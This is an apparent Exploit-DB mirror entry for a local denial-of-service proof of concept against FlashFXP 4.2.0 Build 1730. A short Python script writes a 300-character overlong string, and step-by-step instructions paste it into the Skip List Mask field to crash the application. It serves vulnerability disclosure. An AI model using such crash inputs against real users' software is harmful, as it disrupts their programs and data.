exploit-db-mirror/exploits/windows/dos/48269.py
Offensive Security 19615ff704 DB: 2020-04-01
7 changes to exploits/shellcodes

FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)
Redis - Replication Code Execution (Metasploit)
IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)
DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)
SharePoint Workflows - XOML Injection (Metasploit)
Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection
Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection
2020-04-01 05:01:47 +00:00

29 lines
No EOL
1,020 B
Python
Executable file

# Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)
# Vendor Homepage: https://www.flashfxp.com/
# Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-03-30
# Vulnerable Software: FlashFXP
# Version: 4.2.0 Build 1730
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 10 Pro (64 bit)
#Steps to Produce the Crash:
# 1.- Run python code: FlashCrash.py
# 2.- Copy content to clipboard
# 3.- Open "FlashFXP.exe"
# 4.- Go to "Options" > Filters > Skip List > New Entry
# 5.- Paste ClipBoard into the "Mask" field
# 6.- Click on OK
# 7.- Go to "Options" > Filters > Skip List
# 8.- Crashed
#################################################################################################################################################
#Python "FlashCrash.py" Code:
buffer = "\x41" * 300
f = open ("FlashCrash.txt", "w")
f.write(buffer)
f.close()